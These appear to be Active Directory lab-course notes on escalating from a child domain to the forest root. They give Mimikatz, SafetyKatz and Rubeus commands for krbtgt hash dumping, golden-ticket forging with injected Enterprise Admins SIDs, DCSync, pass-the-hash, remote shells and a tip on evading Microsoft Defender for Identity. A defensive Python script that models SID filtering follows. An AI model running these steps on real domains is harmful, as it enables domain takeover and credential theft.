Using KRBTGT Hash

We abuse sIDHistory again. First, dump the credentials and obtain the krbtgt hash of dcorp-dc.

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

We can then forge an inter-realm TGT for Administrator and inject it into the current session.

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit"

In the above command, the mimikatz option "/sids" forcibly sets the sIDHistory of the dollarcorp.moneycorp.local ticket to S-1-5-21-335606122-960912869-3279953914-519, the Enterprise Admins group of the forest root (moneycorp.local).

We can now access mcorp:

winrs -r:mcorp-dc.moneycorp.local cmd
  • On any machine of the current domain, inject the saved ticket

Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'
  • We can now run commands on the remote machine

ls \\mcorp-dc.moneycorp.local\c$
gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local
  • If you can't get a shell on the remote system with winrs (you get an error like the one in the screenshot below), here is how to get a shell 🤟 (DCSync)

  1. Run the DCSync attack against the krbtgt hash of the forest root

C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:mcorp\administrator /domain:moneycorp.local" "exit"
  2. Now use over-pass-the-hash to start a process as the administrator of moneycorp.local, the domain we want the request to be sent to

C:\Windows\system32>C:\AD\Tools\Rubeus.exe asktgt /user:moneycorp.local\administrator /domain:moneycorp.local /dc:mcorp-dc.moneycorp.local /aes256:a85958da138b6b0cea2ec07d3cb57b76fdbd6886938c0250bb5873e2b32371a0 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
  • You should now have a new process running as domain administrator of mcorp-dc; run the winrs command again and you should have shell access

winrs -r:mcorp-dc cmd
  • Avoid suspicious logs by using the Domain Controllers group (bypasses MDI detection). Note: /user:dcorp-dc$ used to work earlier (until April 2023), but now we need to use /user:Administrator

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden -dc$ /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /groups:516 /sids:S-1-5-21-280534878-1496970234-700767426-516,S-1-5-9 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit"
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"

Domain SIDs:

  • S-1-5-21-2578538781-2508153159-3419410681-516 - Domain Controllers

  • S-1-5-9 - Enterprise Domain Controllers
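The reason the forged /sids values above are honoured is that SID filtering is not applied to parent-child trusts inside a forest by default; on a quarantined trust (netdom trust ... /quarantine:Yes) or a forest/external trust the foreign SIDs are stripped from the PAC. The following Python is an added defender-side example, not part of these notes or of mimikatz/Rubeus: it pulls the /sid and /sids values out of the two kerberos::golden command lines on this page (used here as constructed sample input) and applies a simplified model of SID filtering to them, reporting which extra SIDs are foreign or privileged and whether filtering would drop them. The rule set (foreign-domain SIDs and S-1-5-9 dropped, RIDs 512/516/518/519 flagged) is a deliberate simplification of the real filtering rules, stated as an assumption.

```python
"""Simplified model of SID filtering applied to the extra SIDs (sIDHistory / ExtraSids)
of a forged Kerberos ticket. Added example: the rule set is an assumption, not the
full Windows implementation; sample inputs are the commands quoted on this page."""
import re
from dataclasses import dataclass

# RIDs of built-in groups whose presence in a foreign sIDHistory is never legitimate.
PRIVILEGED_RIDS = {
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
}
# Well-known SIDs that SID filtering strips regardless of trust type (modelled assumption).
ALWAYS_FILTERED = {"S-1-5-9": "Enterprise Domain Controllers"}

# Domain SID (S-1-5-21-x-y-z) with an optional trailing RID.
DOMAIN_SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)(?:-(\d+))?$")

# Constructed sample input: the two golden-ticket commands from this page.
CMD_EA_SIDHISTORY = ('kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local '
                     '/sid:S-1-5-21-719815819-3726368948-3917688648 '
                     '/sids:S-1-5-21-335606122-960912869-3279953914-519 /krbtgt:<hash> /ptt')
CMD_DC_GROUP = ('kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local '
                '/sid:S-1-5-21-1874506631-3219952063-538504511 /groups:516 '
                '/sids:S-1-5-21-280534878-1496970234-700767426-516,S-1-5-9 /krbtgt:<hash> /ptt')


@dataclass
class Finding:
    sid: str
    reason: str
    stripped_by_sid_filtering: bool  # True if a quarantined trust would drop this SID


def split_sid(sid):
    """Return (domain_sid, rid) for a domain SID; (None, None) for well-known SIDs like S-1-5-9."""
    m = DOMAIN_SID_RE.match(sid)
    if not m:
        return None, None
    return m.group(1), (int(m.group(2)) if m.group(2) else None)


def check_extra_sids(ticket_domain_sid, extra_sids):
    """Evaluate each extra SID against the domain the ticket claims to come from.

    Model: a quarantined trust drops every SID whose domain part differs from the
    trusted domain, and always drops S-1-5-9. An intra-forest parent-child trust does
    not filter by default, so a foreign SID survives there; that gap is what the
    /sids option on this page relies on.
    """
    findings = []
    for sid in extra_sids:
        if sid in ALWAYS_FILTERED:
            findings.append(Finding(sid, f"well-known {ALWAYS_FILTERED[sid]} SID injected", True))
            continue
        domain, rid = split_sid(sid)
        if domain is None:
            findings.append(Finding(sid, "unparseable SID", True))
            continue
        foreign = domain != ticket_domain_sid
        if rid in PRIVILEGED_RIDS:
            scope = "foreign" if foreign else "local"
            findings.append(Finding(sid, f"{scope} {PRIVILEGED_RIDS[rid]} (RID {rid}) in sIDHistory", foreign))
        elif foreign:
            findings.append(Finding(sid, "SID from another domain in sIDHistory", True))
    return findings


def parse_golden_command(cmd):
    """Pull the /sid: and /sids: values out of a mimikatz kerberos::golden command line."""
    sid = re.search(r"/sid:(S-[\d-]+)", cmd).group(1)
    sids_match = re.search(r"/sids:([^\s\"]+)", cmd)
    extra = sids_match.group(1).split(",") if sids_match else []
    return sid, extra


def analyze_command(cmd):
    """Parse a golden-ticket command and return the findings for its extra SIDs."""
    ticket_domain_sid, extra = parse_golden_command(cmd)
    return check_extra_sids(ticket_domain_sid, extra)


if __name__ == "__main__":
    for name, cmd in (("EA via sIDHistory", CMD_EA_SIDHISTORY), ("DC group", CMD_DC_GROUP)):
        print(name)
        for f in analyze_command(cmd):
            print(f"  {f.sid}: {f.reason}; dropped by SID filtering: {f.stripped_by_sid_filtering}")
```

Run as a script it lists, for each command, the injected SIDs and whether a quarantined trust would strip them; the same check_extra_sids function can be fed the ExtraSids of a decoded PAC from a test environment to see which SIDs a trust boundary should never have let through.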
